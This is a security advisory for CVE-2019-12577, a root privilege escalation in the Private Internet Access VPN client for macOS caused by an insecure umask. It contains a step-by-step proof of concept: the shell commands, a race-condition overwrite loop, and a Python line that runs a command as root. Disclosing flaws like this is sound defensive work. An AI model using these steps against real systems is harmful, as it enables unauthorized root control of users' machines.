ASA-2019-00383 – London Trust Media Private Internet Access: Insecure umask


Allele Security Alert

ASA-2019-00383

Identifier(s)

ASA-2019-00383, CVE-2019-12577

Title

Insecure umask

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for macOS v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for macOS v1.2.1 or later

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

Technical details

The PIA macOS binary openvpn_launcher.64 is setuid root. This binary creates /tmp/pia_upscript.sh when executed. Because the file creation mask (umask) is not reset, the umask value is inherited from the calling process. This value can be manipulated to cause the privileged binary to create files with world-writable permissions. A local unprivileged user can modify /tmp/pia_upscript.sh during the connect process to execute arbitrary code as the root user.

All steps are executed as a low privileged user.

Step 1 – set umask to 0000.

umask 0000

Step 2 – Verify the mask is 0000.

umask

Step 3 – Execute openvpn_launcher.64. This will create /tmp/pia_upscript.sh with permissions of 777.

# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher 2>/dev/null

Step 4 – Verify /tmp/pia_upscript.sh is world writable.

ls -ld /tmp/pia_upscript.sh

Step 5 – Create a copy of /tmp/pia_upscript.sh.

cp /tmp/pia_upscript.sh /tmp/pia_upscript.sh.woot

Step 6 – Insert arbitrary code in /tmp/pia_upscript.sh.woot.

For this PoC we will execute the id command and pipe the output to wall. This will display the uid/gid via a system broadcast message.

# Add this line as line #2 of /tmp/pia_upscript.sh.woot.
python -c 'import os;os.setuid(0);os.system("id|wall");'

Step 7 – Beat the race condition by continuously overwriting /tmp/pia_upscript.sh. Put the job in the background. This is required because during the connection process the script will be overwritten.

cd /tmp
while true; do cp pia_upscript.sh.woot pia_upscript.sh; done &

Step 8 – Execute run.sh to open the PIA GUI client.

/Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh

Step 9 – Log in and connect to the VPN.

During the connection process /tmp/pia_upscript.sh will be executed as root, and you should see a wall message showing the output of the id command with uid=0.

Credits

Rich Mirch

Reference(s)

PIA macOS Privilege Escalation: Insecure umask
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12577.txt

CVE-2019-12577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12577

CVE-2019-12577
https://nvd.nist.gov/vuln/detail/CVE-2019-12577

If there is any error in this alert or you wish for a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.